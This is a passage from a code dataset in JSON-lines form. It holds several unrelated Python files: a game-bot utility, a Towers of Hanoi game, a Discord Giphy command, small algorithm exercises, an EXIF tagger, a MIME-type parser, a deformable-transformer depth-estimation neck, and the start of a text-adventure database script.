999,\n \"x\": None,\n \"y\": None,\n \"id\": None\n }\n for npc in npcs:\n if closest[\"dist\"] > npc[\"dist\"] >= min_dist:\n closest = {\n \"dist\": npc[\"dist\"],\n \"x\": math.floor(npc[\"x\"]),\n \"y\": math.floor(npc[\"y\"]),\n \"id\": npc[\"id\"]\n }\n if closest['x'] is None:\n return False\n else:\n return closest\n\n\n'''\n|@@@@@@@@@@@@@@|\n|@@DEPRECATED@@|\nV@@@@@@@@@@@@@@V\n'''\n\n\ndef rough_img_compare(img, confidence, region):\n while True:\n try:\n loc = pyautogui.locateOnScreen(img, confidence=confidence, region=region)\n if loc:\n return loc\n else:\n return False\n except Exception as e:\n print('error calling screenshot, retrying.', e)\n","repo_name":"glandon22/AutoOldSchool","sub_path":"osrs/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38151821585","text":"from stack import Stack\n\nprint(\"\\nLet's play Towers of Hanoi!!\")\n\n#Create the Stacks\nstacks = []\nleft_stack = Stack(\"Left\")\nmiddle_stack = Stack(\"Middle\")\nright_stack = Stack(\"Right\")\nstacks += [left_stack, middle_stack, right_stack]\n\n#Set up the Game\nnum_disks = int(input(\"\\nHow many disks do you want to play with?\\n\"))\n\nwhile num_disks < 3:\n num_disks = int(input(\"Enter a number greater than or equal to 3\\n\"))\n\nfor disk in range(num_disks, 0, -1):\n left_stack.push(disk)\n\nnum_optmial_moves = (2 ** num_disks) - 1\nprint(\"\\nThe fastest you can solve this game is in {0} moves\".format(num_optmial_moves))\n#Get User Input\ndef get_imput():\n choices = [stack.get_name()[0] for stack in stacks]\n while True:\n\n for i in range(len(stacks)):\n name = stacks[i].get_name()\n letter = choices[i]\n print(\"Enter {0} for {1}\".format(letter, name))\n user_imput = input(\"\")\n\n if user_imput in choices:\n for i in range(len(stacks)):\n if user_imput == choices[i]:\n return stacks[i]\n#Play the Game\nnum_user_moves = 0\n\nwhile(right_stack.get_size() != num_disks):\n\n print(\"\\n\\n\\n...Current Stacks...\")\n for stack in stacks:\n stack.print_items()\n \n while True:\n print(\"\\nWhich stack do you want to move from?\\n\")\n form_stack = get_imput()\n print(\"\\nWhich stack do you want to move to?\\n\")\n to_stack = get_imput()\n if form_stack.get_size() == 0:\n print(\"\\n\\nInvalid Move. Try Again\")\n elif to_stack.get_size() == 0 or form_stack.peek() < to_stack.peek():\n disk = form_stack.pop()\n to_stack.push(disk)\n num_user_moves += 1\n break\n else:\n print(\"\\n\\nInvalid Move. Try Again\")\n\n\nprint(\"\\n\\nYou completed the game in {0} moves, and the optimal number of moves is {1}\".format(num_user_moves, num_optmial_moves))\n","repo_name":"Yelowes/Towers-of-Hanoi","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"22150851549","text":"import random\r\nimport urllib.request\r\nimport requests\r\nimport os\r\nimport json\r\nimport discord\r\nfrom discord.ext import commands\r\n\r\nimp = 'Json/'\r\nif os.path.exists(imp + 'BotSettings.json'):\r\n\twith open(imp + 'BotSettings.json') as t:\r\n\t\tt = json.load(t)\r\n\t\tGIPHY_API = t['GIPHY']\r\n\r\nclass Giphy(commands.Cog):\r\n\tdef __init__(self, bot, settings):\r\n\t\tself.bot = bot\r\n\t\tself.settings = settings\r\n\r\n\t@commands.command()\r\n\tasync def gif(self, ctx, *, giphy:str=None):\r\n\t\t\"\"\"\r\n\t\t[search]\r\n\t\tThis searchs for a giph image\r\n\t\t\"\"\"\r\n\t\t\t\r\n\t\tif not giphy:\r\n\t\t\twith urllib.request.urlopen(f'https://api.giphy.com/v1/gifs/random?api_key={GIPHY_API}&rating=R') as url:\r\n\t\t\t\tdata = json.loads(url.read().decode())\r\n\t\t\t\tdata = data['data']\r\n\t\t\t\tdata = data['embed_url']\r\n\t\telse:\r\n\t\t\tgiphy = giphy.replace(\" \", \"+\")\r\n\t\t\twith urllib.request.urlopen(f\"http://api.giphy.com/v1/gifs/search?q={giphy}&api_key={GIPHY_API}&limit=1&rating=R\") as url:\r\n\t\t\t\tdata = json.loads(url.read().decode())\r\n\t\t\t\tdata = random.choice(data['data'])\r\n\t\t\t\tdata = data['embed_url']\r\n\r\n\t\tif ctx.author.top_role.colour:\r\n\t\t\tcol = ctx.author.top_role.colour\r\n\t\telse:\r\n\t\t\tcol =self.settings.randomColor()\r\n\r\n\t\tembed=discord.Embed(title=f\"Gif\", color=col)\r\n\t\tembed.set_image(url=data)\r\n\t\tawait ctx.send(embed=embed)\r\n\t\t# await ctx.send(data)\r\n\r\ndef setup(bot):\r\n\tsettings = bot.get_cog(\"Settings\")\r\n\tbot.add_cog(Giphy(bot, settings))","repo_name":"ScoobyChan/ScrappyBot","sub_path":"Cogs/Giphy.py","file_name":"Giphy.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20677011373","text":"# Write a function called sumZero which accepts a sorted array of integers. The function should find the first pair where the sum is 0. Return an array that includes both values that sum to Zero or undefined if a pair does not exist.\n\n# Ex: [-3, -2, -1, 0, 1, 2, 3, 4, 6, 7] = > [-3, 3]\n\n# [-2, 0, 1, 3] = > undefined\n\n# [1, 2, 3] = > undefined\n\ndef sumZero(array):\n\n i = 0\n j = len(array) - 1\n while i < j:\n if array[i] + array[j] == 0:\n return [array[i], array[j]]\n if array[i] + array[j] > 0:\n j -= 1\n else:\n i += 1\n","repo_name":"jonnynotbravo/DS-Algos","sub_path":"Sum Zero.py","file_name":"Sum Zero.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12462504671","text":"from PIL.ExifTags import TAGS\nfrom PIL import Image\nimport piexif\n\n\nimg_path = 'insta_images/jusep.v_1.jpg'\nimg = Image.open(img_path)\n# info = img._getexif()\n\ntmp = input('태그를 입력하세요 : ')\n\nprint(img.info.items())\n# print(tmp)\nif 'exif' not in img.info.keys():\n tag = {\n piexif.ImageIFD.XPKeywords: tmp.encode('utf-8')\n }\n exif_dict = {'tag' : tag}\n exif_bytes = piexif.dump(exif_dict)\n piexif.insert(exif_bytes, img_path)\n\nelse:\n exif_dict = piexif.load(img.info['exif'])\n exif_dict['tag'][20] = tmp.encode('utf-8')\n exif_bytes = piexif.dump(exif_dict)\n new_file = img_path\n img.save(new_file, 'jpg', exif=exif_bytes)\n\n# new_img = Image.open(img_path)\n# print(new_img.info.items())\n# print(new_img.info['exif'].decode('utf-8'))","repo_name":"jusepv/software_exercise","sub_path":"software_project/imageTag2.py","file_name":"imageTag2.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17746121811","text":"# Good morning! Here's your coding interview problem for today.\n#\n# This problem was asked by Epic.\n#\n# The \"look and say\" sequence is defined as follows: beginning with the term 1, each subsequent term visually describes the digits appearing in the previous term. The first few terms are as follows:\n#\n# 1\n# 11\n# 21\n# 1211\n# 111221\n# As an example, the fourth term is 1211, since the third term consists of one 2 and one 1.\n#\n# Given an integer N, print the Nth term of this sequence.\n\nclass Solution:\n\n def countAndSay(self, n: int) -> str:\n if n == 1:\n return \"1\"\n if n == 2:\n return \"11\"\n\n s = \"11\"\n for i in range(3, n + 1):\n\n # adding dummpy end of charter so that loop doesn't runs out of bound\n # and it counts the number of characters.\n s += \"$\"\n tmp = \"\"\n c = 1\n for j in range(1, len(s)):\n if (s[j] != s[j - 1]):\n tmp += str(c + 0)\n tmp += s[j - 1]\n c = 1\n else:\n c += 1\n s = tmp\n return s\n\n\nmy_new_instance = Solution()\nprint(my_new_instance.countAndSay(30))\n","repo_name":"shubhambakre/DailyCodingProblems","sub_path":"October/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19627610096","text":"import torch.nn as nn\nfrom mmcv.cnn import ConvModule, xavier_init\n \nfrom mmseg.ops import resize\nfrom mmseg.models.builder import DEPTHNECK\n\nimport torch\nimport math\n\nfrom torch.nn.modules.activation import MultiheadAttention\n\nfrom mmdepth.models.necks.ops.modules import MSDeformAttn\nimport copy\n\nfrom torch.nn.init import xavier_uniform_, constant_, uniform_, normal_\nimport torch.nn.functional as F\n\n@DEPTHNECK.register_module()\nclass DepthAffMultiLevelNeck(nn.Module):\n \"\"\"MultiLevelNeck.\n\n A neck structure connect vit backbone and decoder_heads. For DPT resemble blocks.\n Args:\n in_channels (List[int]): Number of input channels per scale.\n out_channels (int): Number of output channels (used at each scale).\n scales (List[float]): Scale factors for each input feature map.\n Default: [0.5, 1, 2, 4]\n norm_cfg (dict): Config dict for normalization layer. Default: None.\n act_cfg (dict): Config dict for activation layer in ConvModule.\n Default: None.\n \"\"\"\n\n def __init__(self,\n in_channels,\n out_channels,\n scales=[0.5, 1, 2, 4],\n norm_cfg=None,\n act_cfg=None,\n embedding_dim=256,\n nhead=8,\n num_encoder_layers=4,\n num_decoder_layers=4,\n dim_feedforward=1024,\n dropout=0.1,\n dec_n_points=4,\n enc_n_points=4):\n\n super(DepthAffMultiLevelNeck, self).__init__()\n assert isinstance(in_channels, list)\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.scales = scales\n self.num_outs = len(scales)\n self.lateral_convs = nn.ModuleList()\n self.convs = nn.ModuleList()\n self.embedding_dim = embedding_dim\n\n # deformable transformer\n self.nhead=nhead\n self.num_encoder_layers=num_encoder_layers\n self.num_decoder_layers=num_decoder_layers\n self.dim_feedforward=dim_feedforward\n self.dropout=dropout\n self.dec_n_points=dec_n_points\n self.enc_n_points=enc_n_points\n\n # basic convs for skip connection\n for in_channel, out_channel in zip(in_channels, out_channels):\n self.lateral_convs.append(\n ConvModule(\n in_channel,\n out_channel,\n kernel_size=1,\n norm_cfg=norm_cfg,\n act_cfg=act_cfg))\n for in_channel, out_channel in zip(out_channels, out_channels):\n self.convs.append(\n ConvModule(\n in_channel,\n out_channel,\n kernel_size=3,\n padding=1,\n stride=1,\n norm_cfg=norm_cfg,\n act_cfg=act_cfg))\n\n\n # channel proj, project all the feats to the same channel for fusion\n self.proj_convs = nn.ModuleList()\n for in_channel, out_channel in zip(in_channels, out_channels):\n self.proj_convs.append(\n ConvModule(\n in_channel,\n embedding_dim,\n kernel_size=1,\n norm_cfg=norm_cfg,\n act_cfg=act_cfg))\n\n self.feat_pos_embed = PositionEmbeddingSine(self.embedding_dim//2)\n self.query_pos_embed = PositionEmbeddingSine(self.embedding_dim//2)\n self.reference_points = nn.Linear(self.embedding_dim, 2)\n\n self.transformer = DeformableTransformer(d_model=self.embedding_dim,\n nhead=self.nhead,\n num_encoder_layers=self.num_encoder_layers,\n num_decoder_layers=self.num_decoder_layers,\n dim_feedforward=self.dim_feedforward,\n dropout=self.dropout,\n activation=\"relu\",\n return_intermediate_dec=True,\n num_feature_levels=len(in_channels) - 1,\n dec_n_points=self.dec_n_points,\n enc_n_points=self.enc_n_points)\n\n self.conv_fusion = ConvModule(\n in_channels[0],\n out_channels[0],\n kernel_size=3,\n padding=1,\n stride=1,\n norm_cfg=norm_cfg,\n act_cfg=act_cfg)\n\n def get_valid_ratio(self, mask):\n _, H, W = mask.shape\n valid_H = torch.sum(~mask[:, :, 0], 1)\n valid_W = torch.sum(~mask[:, 0, :], 1)\n valid_ratio_h = valid_H.float() / H\n valid_ratio_w = valid_W.float() / W\n valid_ratio = torch.stack([valid_ratio_w, valid_ratio_h], -1)\n return valid_ratio\n\n @staticmethod\n def get_reference_points(spatial_shapes, valid_ratios, device):\n reference_points_list = []\n for lvl, (H_, W_) in enumerate(spatial_shapes):\n\n ref_y, ref_x = torch.meshgrid(torch.linspace(0.5, H_ - 0.5, H_, dtype=torch.float32, device=device),\n torch.linspace(0.5, W_ - 0.5, W_, dtype=torch.float32, device=device))\n ref_y = ref_y.reshape(-1)[None] / (valid_ratios[:, None, lvl, 1] * H_)\n ref_x = ref_x.reshape(-1)[None] / (valid_ratios[:, None, lvl, 0] * W_)\n ref = torch.stack((ref_x, ref_y), -1)\n reference_points_list.append(ref)\n reference_points = torch.cat(reference_points_list, 1)\n reference_points = reference_points[:, :, None] * valid_ratios[:, None]\n return reference_points\n\n def forward(self, src, spatial_shapes, level_start_index, valid_ratios, pos=None, padding_mask=None):\n output = src\n reference_points = self.get_reference_points(spatial_shapes, valid_ratios, device=src.device)\n for _, layer in enumerate(self.layers):\n output = layer(output, pos, reference_points, spatial_shapes, level_start_index, padding_mask)\n\n return output\n\n # default init_weights for conv(msra) and norm in ConvModule\n def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n xavier_init(m, distribution='uniform')\n\n def forward(self, inputs):\n assert len(inputs) == len(self.in_channels)\n\n inputs = [\n lateral_conv(inputs[i])\n for i, lateral_conv in enumerate(self.lateral_convs)\n ]\n # for len(inputs) not equal to self.num_outs\n if len(inputs) == 1:\n inputs = [inputs[0] for _ in range(self.num_outs)]\n outs = []\n for i in range(self.num_outs):\n x_resize = resize(\n inputs[i], scale_factor=self.scales[i], mode='bilinear')\n outs.append(self.convs[i](x_resize))\n\n\n # here, List[outs] saves the skip transformer feats\n masks = []\n srcs = []\n poses = []\n query_feat = None\n for i in range(len(outs)):\n if i == len(outs) - 1:\n query_feat = self.proj_convs[i](outs[i])\n _bs, _c, _h, _w = query_feat.shape\n else:\n mask = torch.zeros_like(outs[i][:, 0, :, :]).type(torch.bool)\n masks.append(mask)\n pos = self.feat_pos_embed(outs[i], mask)\n poses.append(pos)\n feat = self.proj_convs[i](outs[i])\n srcs.append(feat)\n \n query_mask = torch.zeros_like(query_feat[:, 0, :, :]).type(torch.bool)\n query_embed = self.query_pos_embed(query_feat, query_mask).flatten(2).transpose(1, 2)\n query_feat = query_feat.flatten(2).transpose(1, 2)\n \n hs, refs, memory = self.transformer(srcs, masks, poses, query_embed=query_embed, query_feat=query_feat)\n # start_point = 0\n # for i in range(len(outs) - 1):\n # bs, c, h, w = outs[i].shape\n # end_point = start_point + h * w\n # map = memory[:, start_point:end_point, :].permute(0, 2, 1).reshape(bs, self.embedding_dim, h, w)\n # feat = torch.cat([outs[i], map], dim=1)\n # outs[i] = feat\n # start_point = end_point\n\n map = hs[-1].permute(0, 2, 1).reshape(_bs, self.embedding_dim, _h, _w)\n feat = torch.cat([outs[-1], map], dim=1)\n outs[-1] = feat\n\n return tuple(outs)\n\n\n\n# position embedding for fusion layer\nclass PositionEmbeddingSine(nn.Module):\n \"\"\"\n This is a more standard version of the position embedding, very similar to the one\n used by the Attention is all you need paper, generalized to work on images.\n \"\"\"\n def __init__(self, num_pos_feats=64, temperature=10000, normalize=False, scale=None):\n super().__init__()\n self.num_pos_feats = num_pos_feats\n self.temperature = temperature\n self.normalize = normalize\n if scale is not None and normalize is False:\n raise ValueError(\"normalize should be True if scale is passed\")\n if scale is None:\n scale = 2 * math.pi\n self.scale = scale\n\n def forward(self, x, mask):\n assert mask is not None\n not_mask = ~mask\n y_embed = not_mask.cumsum(1, dtype=torch.float32)\n x_embed = not_mask.cumsum(2, dtype=torch.float32)\n if self.normalize:\n eps = 1e-6\n y_embed = (y_embed - 0.5) / (y_embed[:, -1:, :] + eps) * self.scale\n x_embed = (x_embed - 0.5) / (x_embed[:, :, -1:] + eps) * self.scale\n\n dim_t = torch.arange(self.num_pos_feats, dtype=torch.float32, device=x.device)\n dim_t = self.temperature ** (2 * (dim_t // 2) / self.num_pos_feats)\n\n pos_x = x_embed[:, :, :, None] / dim_t\n pos_y = y_embed[:, :, :, None] / dim_t\n pos_x = torch.stack((pos_x[:, :, :, 0::2].sin(), pos_x[:, :, :, 1::2].cos()), dim=4).flatten(3)\n pos_y = torch.stack((pos_y[:, :, :, 0::2].sin(), pos_y[:, :, :, 1::2].cos()), dim=4).flatten(3)\n pos = torch.cat((pos_y, pos_x), dim=3).permute(0, 3, 1, 2)\n return pos\n\nclass PositionEmbeddingLearned(nn.Module):\n \"\"\"\n Absolute pos embedding, learned.\n \"\"\"\n def __init__(self, num_pos_feats=256):\n super().__init__()\n self.row_embed = nn.Embedding(50, num_pos_feats)\n self.col_embed = nn.Embedding(50, num_pos_feats)\n self.reset_parameters()\n\n def reset_parameters(self):\n nn.init.uniform_(self.row_embed.weight)\n nn.init.uniform_(self.col_embed.weight)\n\n def forward(self, x, mask):\n h, w = x.shape[-2:]\n i = torch.arange(w, device=x.device)\n j = torch.arange(h, device=x.device)\n x_emb = self.col_embed(i)\n y_emb = self.row_embed(j)\n pos = torch.cat([\n x_emb.unsqueeze(0).repeat(h, 1, 1),\n y_emb.unsqueeze(1).repeat(1, w, 1),\n ], dim=-1).permute(2, 0, 1).unsqueeze(0).repeat(x.shape[0], 1, 1, 1)\n return pos\n\nclass DeformableTransformer(nn.Module):\n def __init__(self, d_model=256, nhead=8,\n num_encoder_layers=6, num_decoder_layers=6, dim_feedforward=1024, dropout=0.1,\n activation=\"relu\", return_intermediate_dec=False,\n num_feature_levels=4, dec_n_points=4, enc_n_points=4):\n super().__init__()\n\n self.d_model = d_model\n self.nhead = nhead\n\n encoder_layer = DeformableTransformerEncoderLayer(d_model, dim_feedforward,\n dropout, activation,\n num_feature_levels, nhead, enc_n_points)\n self.encoder = DeformableTransformerEncoder(encoder_layer, num_encoder_layers)\n\n decoder_layer = DeformableTransformerDecoderLayer(d_model, dim_feedforward,\n dropout, activation,\n num_feature_levels, nhead, dec_n_points)\n self.decoder = DeformableTransformerDecoder(decoder_layer, num_decoder_layers, return_intermediate_dec)\n\n self.level_embed = nn.Parameter(torch.Tensor(num_feature_levels, d_model))\n\n self.reference_points = nn.Linear(d_model, 2)\n\n self._reset_parameters()\n\n def _reset_parameters(self):\n for p in self.parameters():\n if p.dim() > 1:\n nn.init.xavier_uniform_(p)\n for m in self.modules():\n if isinstance(m, MSDeformAttn):\n m._reset_parameters()\n xavier_uniform_(self.reference_points.weight.data, gain=1.0)\n constant_(self.reference_points.bias.data, 0.)\n normal_(self.level_embed)\n\n def get_valid_ratio(self, mask):\n _, H, W = mask.shape\n valid_H = torch.sum(~mask[:, :, 0], 1)\n valid_W = torch.sum(~mask[:, 0, :], 1)\n valid_ratio_h = valid_H.float() / H\n valid_ratio_w = valid_W.float() / W\n valid_ratio = torch.stack([valid_ratio_w, valid_ratio_h], -1)\n return valid_ratio\n\n def forward(self, srcs, masks, pos_embeds, query_embed=None, query_feat=None):\n\n # prepare input for encoder\n src_flatten = []\n mask_flatten = []\n lvl_pos_embed_flatten = []\n spatial_shapes = []\n for lvl, (src, mask, pos_embed) in enumerate(zip(srcs, masks, pos_embeds)):\n bs, c, h, w = src.shape\n spatial_shape = (h, w)\n spatial_shapes.append(spatial_shape)\n src = src.flatten(2).transpose(1, 2)\n mask = mask.flatten(1)\n pos_embed = pos_embed.flatten(2).transpose(1, 2)\n lvl_pos_embed = pos_embed + self.level_embed[lvl].view(1, 1, -1)\n lvl_pos_embed_flatten.append(lvl_pos_embed)\n src_flatten.append(src)\n mask_flatten.append(mask)\n src_flatten = torch.cat(src_flatten, 1)\n mask_flatten = torch.cat(mask_flatten, 1)\n lvl_pos_embed_flatten = torch.cat(lvl_pos_embed_flatten, 1)\n spatial_shapes = torch.as_tensor(spatial_shapes, dtype=torch.long, device=src_flatten.device)\n level_start_index = torch.cat((spatial_shapes.new_zeros((1, )), spatial_shapes.prod(1).cumsum(0)[:-1]))\n valid_ratios = torch.stack([self.get_valid_ratio(m) for m in masks], 1)\n\n # encoder\n memory = self.encoder(src_flatten, spatial_shapes, level_start_index, valid_ratios, lvl_pos_embed_flatten, mask_flatten)\n\n # prepare input for decoder\n bs, _, c = memory.shape\n tgt = query_feat \n query_embed = query_embed\n reference_points = self.reference_points(query_embed).sigmoid()\n\n # decoder\n hs, inter_references = self.decoder(tgt, reference_points, memory,\n spatial_shapes, level_start_index, valid_ratios, query_embed, mask_flatten)\n\n return hs, inter_references, memory\n\nclass DeformableTransformerEncoderLayer(nn.Module):\n def __init__(self,\n d_model=256, d_ffn=1024,\n dropout=0.1, activation=\"relu\",\n n_levels=4, n_heads=8, n_points=4):\n super().__init__()\n\n # self attention\n self.self_attn = MSDeformAttn(d_model, n_levels, n_heads, n_points)\n self.dropout1 = nn.Dropout(dropout)\n self.norm1 = nn.LayerNorm(d_model)\n\n # ffn\n self.linear1 = nn.Linear(d_model, d_ffn)\n self.activation = _get_activation_fn(activation)\n self.dropout2 = nn.Dropout(dropout)\n self.linear2 = nn.Linear(d_ffn, d_model)\n self.dropout3 = nn.Dropout(dropout)\n self.norm2 = nn.LayerNorm(d_model)\n\n @staticmethod\n def with_pos_embed(tensor, pos):\n return tensor if pos is None else tensor + pos\n\n def forward_ffn(self, src):\n src2 = self.linear2(self.dropout2(self.activation(self.linear1(src))))\n src = src + self.dropout3(src2)\n src = self.norm2(src)\n return src\n\n def forward(self, src, pos, reference_points, spatial_shapes, level_start_index, padding_mask=None):\n # self attention\n src2 = self.self_attn(self.with_pos_embed(src, pos), reference_points, src, spatial_shapes, level_start_index, padding_mask)\n src = src + self.dropout1(src2)\n src = self.norm1(src)\n\n # ffn\n src = self.forward_ffn(src)\n\n return src\n\n\nclass DeformableTransformerEncoder(nn.Module):\n def __init__(self, encoder_layer, num_layers):\n super().__init__()\n self.layers = _get_clones(encoder_layer, num_layers)\n self.num_layers = num_layers\n\n @staticmethod\n def get_reference_points(spatial_shapes, valid_ratios, device):\n reference_points_list = []\n for lvl, (H_, W_) in enumerate(spatial_shapes):\n\n ref_y, ref_x = torch.meshgrid(torch.linspace(0.5, H_ - 0.5, H_, dtype=torch.float32, device=device),\n torch.linspace(0.5, W_ - 0.5, W_, dtype=torch.float32, device=device))\n ref_y = ref_y.reshape(-1)[None] / (valid_ratios[:, None, lvl, 1] * H_)\n ref_x = ref_x.reshape(-1)[None] / (valid_ratios[:, None, lvl, 0] * W_)\n ref = torch.stack((ref_x, ref_y), -1)\n reference_points_list.append(ref)\n reference_points = torch.cat(reference_points_list, 1)\n reference_points = reference_points[:, :, None] * valid_ratios[:, None]\n return reference_points\n\n def forward(self, src, spatial_shapes, level_start_index, valid_ratios, pos=None, padding_mask=None):\n output = src\n reference_points = self.get_reference_points(spatial_shapes, valid_ratios, device=src.device)\n for _, layer in enumerate(self.layers):\n output = layer(output, pos, reference_points, spatial_shapes, level_start_index, padding_mask)\n\n return output\n\n\nclass DeformableTransformerDecoderLayer(nn.Module):\n def __init__(self, d_model=256, d_ffn=1024,\n dropout=0.1, activation=\"relu\",\n n_levels=4, n_heads=8, n_points=4):\n super().__init__()\n\n # cross attention\n self.cross_attn = MSDeformAttn(d_model, n_levels, n_heads, n_points)\n self.dropout1 = nn.Dropout(dropout)\n self.norm1 = nn.LayerNorm(d_model)\n\n # self attention\n self.self_attn = nn.MultiheadAttention(d_model, n_heads, dropout=dropout)\n self.dropout2 = nn.Dropout(dropout)\n self.norm2 = nn.LayerNorm(d_model)\n\n # ffn\n self.linear1 = nn.Linear(d_model, d_ffn)\n self.activation = _get_activation_fn(activation)\n self.dropout3 = nn.Dropout(dropout)\n self.linear2 = nn.Linear(d_ffn, d_model)\n self.dropout4 = nn.Dropout(dropout)\n self.norm3 = nn.LayerNorm(d_model)\n\n @staticmethod\n def with_pos_embed(tensor, pos):\n return tensor if pos is None else tensor + pos\n\n def forward_ffn(self, tgt):\n tgt2 = self.linear2(self.dropout3(self.activation(self.linear1(tgt))))\n tgt = tgt + self.dropout4(tgt2)\n tgt = self.norm3(tgt)\n return tgt\n\n def forward(self, tgt, query_pos, reference_points, src, src_spatial_shapes, level_start_index, src_padding_mask=None):\n # self attention\n q = k = self.with_pos_embed(tgt, query_pos)\n tgt2 = self.self_attn(q.transpose(0, 1), k.transpose(0, 1), tgt.transpose(0, 1))[0].transpose(0, 1)\n tgt = tgt + self.dropout2(tgt2)\n tgt = self.norm2(tgt)\n\n # cross attention\n tgt2 = self.cross_attn(self.with_pos_embed(tgt, query_pos),\n reference_points,\n src, src_spatial_shapes, level_start_index, src_padding_mask)\n tgt = tgt + self.dropout1(tgt2)\n tgt = self.norm1(tgt)\n\n # ffn\n tgt = self.forward_ffn(tgt)\n\n return tgt\n\n\nclass DeformableTransformerDecoder(nn.Module):\n def __init__(self, decoder_layer, num_layers, return_intermediate=False):\n super().__init__()\n self.layers = _get_clones(decoder_layer, num_layers)\n self.num_layers = num_layers\n self.return_intermediate = return_intermediate\n\n def forward(self, tgt, reference_points, src, src_spatial_shapes, src_level_start_index, src_valid_ratios,\n query_pos=None, src_padding_mask=None):\n output = tgt\n\n intermediate = []\n intermediate_reference_points = []\n for lid, layer in enumerate(self.layers):\n if reference_points.shape[-1] == 4:\n reference_points_input = reference_points[:, :, None] \\\n * torch.cat([src_valid_ratios, src_valid_ratios], -1)[:, None]\n else:\n assert reference_points.shape[-1] == 2\n reference_points_input = reference_points[:, :, None] * src_valid_ratios[:, None]\n output = layer(output, query_pos, reference_points_input, src, src_spatial_shapes, src_level_start_index, src_padding_mask)\n\n if self.return_intermediate:\n intermediate.append(output)\n intermediate_reference_points.append(reference_points)\n\n if self.return_intermediate:\n return torch.stack(intermediate), torch.stack(intermediate_reference_points)\n\n return output, reference_points\n\n\ndef _get_clones(module, N):\n return nn.ModuleList([copy.deepcopy(module) for i in range(N)])\n\n\ndef _get_activation_fn(activation):\n \"\"\"Return an activation function given a string\"\"\"\n if activation == \"relu\":\n return F.relu\n if activation == \"gelu\":\n return F.gelu\n if activation == \"glu\":\n return F.glu\n raise RuntimeError(F\"activation should be relu/gelu, not {activation}.\")","repo_name":"zhyever/DepthFormer","sub_path":"mmdepth/models/necks/multi_level_aff_neck.py","file_name":"multi_level_aff_neck.py","file_ext":"py","file_size_in_byte":22057,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"27693037191","text":"from typing import NamedTuple, Optional, Dict\nfrom enum import Enum\nimport re\n\nfrom ..core.utils import parse_params\n\n# https://tools.ietf.org/html/rfc2045#section-5.1\n# https://tools.ietf.org/html/rfc7231#section-3.1.1.1\n\n\nclass MediaTypes(str, Enum):\n application = 'application'\n audio = 'audio'\n chemical = 'chemical'\n example = 'example'\n font = 'font'\n image = 'image'\n message = 'message'\n model = 'model'\n multipart = 'multipart'\n text = 'text'\n video = 'video'\n\n\n# rfc3025, rfc6839\nclass MediaSuffixes(str, Enum):\n ber = 'ber'\n cbor = 'cbor'\n cbor_seq = 'cbor-seq'\n der = 'der'\n fastinfoset = 'fastinfoset'\n gzip = 'gzip'\n json = 'json'\n json_seq = 'json-seq'\n jwt = 'jwt'\n sqlite3 = 'sqlite3'\n tlv = 'tlv' # https://en.wikipedia.org/wiki/Type-length-value\n xml = 'xml'\n wbxml = 'wbxml'\n zip = 'zip'\n\n\ndef mime_pattern(type: Optional[str] = None) -> str:\n TOKEN = r'[A-Z0-9-.]+'\n\n if not type:\n types = '|'.join(m.value for m in MediaTypes)\n type = f'{types}|x-{TOKEN}'\n suffixes = '|'.join(m.value for m in MediaSuffixes)\n pattern = (f'(?P{type})/'\n f'(?P{TOKEN})'\n fr'(\\+(?P{suffixes}))?')\n return f'(?i:{pattern})'\n\n\ndef content_type_pattern(type: Optional[str] = None) -> str:\n OWS = r'[ \\t]*'\n TOKEN = r'[A-Z0-9!#$%&\\'*+.^_`|~-]+'\n QUOTED = r'\\\"(?:[^\\\"\\\\\\\\]|\\\\.)*\\\"'\n PARAM = f';{OWS}{TOKEN}=({TOKEN}|{QUOTED})'\n\n return f'{mime_pattern(type)}(?P({PARAM})*)'\n\n\nMIME = re.compile(mime_pattern())\n\nCTYPE = re.compile(content_type_pattern(), re.I)\n\n\nclass MediaType(NamedTuple):\n type: str\n subtype: str\n suffix: Optional[str]\n\n def __str__(self) -> str:\n suffix = f'+{self.suffix}' if self.suffix else ''\n return f'{self.type}/{self.subtype}{suffix}'\n\n @classmethod\n def from_str(cls, string: str) -> 'MediaType':\n try:\n return cls(**MIME.match(string).groupdict())\n except AttributeError:\n raise ValueError(string)\n\n\nclass ContentType(NamedTuple):\n type: str\n subtype: str\n suffix: Optional[str]\n params: Optional[Dict[str, str]]\n\n def __str__(self) -> str:\n suffix = f'+{self.suffix}' if self.suffix else ''\n m_type = f'{self.type}/{self.subtype}{suffix}'\n params = [f'{k}={v}' for k, v in (self.params or {}).items()]\n return ';'.join((m_type, *params))\n\n @property\n def media_type(self) -> MediaType:\n return MediaType(type=self.type, subtype=self.subtype, suffix=self.suffix)\n\n @classmethod\n def from_str(cls, string: str) -> 'ContentType':\n try:\n ctype = CTYPE.match(string).groupdict()\n except AttributeError:\n raise ValueError(string)\n\n return cls(type=ctype['type'].lower(),\n subtype=ctype['subtype'].lower(),\n suffix=ctype['suffix'].lower() if ctype['suffix'] else None,\n params=parse_params(ctype['params']))\n","repo_name":"nuno-andre/pydentic","sub_path":"src/pydentic/strings/mime.py","file_name":"mime.py","file_ext":"py","file_size_in_byte":3192,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"73476498668","text":"import sqlite3\nfrom db import Database\nfrom src.room import Room\n\ndb = Database(\"game.db\")\ndb.create_roomDB()\ndb.create_userDB()\n\n# uui, name, description, exits, characters\n\natrium = Room(\"atrium\", \"Atrium\", \"\"\"A two story tall atrium with grand windows, \\\n a central fountain and an excess of green leafy plants.\"\"\")\nmainhall = Room(\"mainhall\", \"Main Hall\", \"\"\"A large, extravagant entry 